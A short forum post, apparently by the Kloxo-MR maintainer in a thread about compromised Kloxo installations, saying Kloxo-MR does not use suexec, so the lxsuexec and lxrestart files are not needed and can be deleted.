I don't know how hacking work. On My Kloxo-MR I was not use suexec mechanism and then no need lxsuxec and lxrestart (save for delete this 2 files).

..:: MRatWork ::..
Server/Web-integrator - perfect not always more useful

--- Need KVM/OpenVZ VPS? - click here (Kloxo-MR READY!) ---

For bug/feature/security - Member rank status

Previous Topic:**KLOXO INSTALLATIONS COMPROMISED**
Goto Forum:
  


Current Time: Sat Aug 23 01:13:01 EDT 2014

Total time taken to generate the page: 0.02449 seconds
.:: Contact :: Home :: Privacy ::.

Click here to lend your support to: LxCenter and make a donation at www.pledgie.com !

Powered by: FUDforum 3.0.2.
Copyright ©2001-2010 FUDforum Bulletin Board Software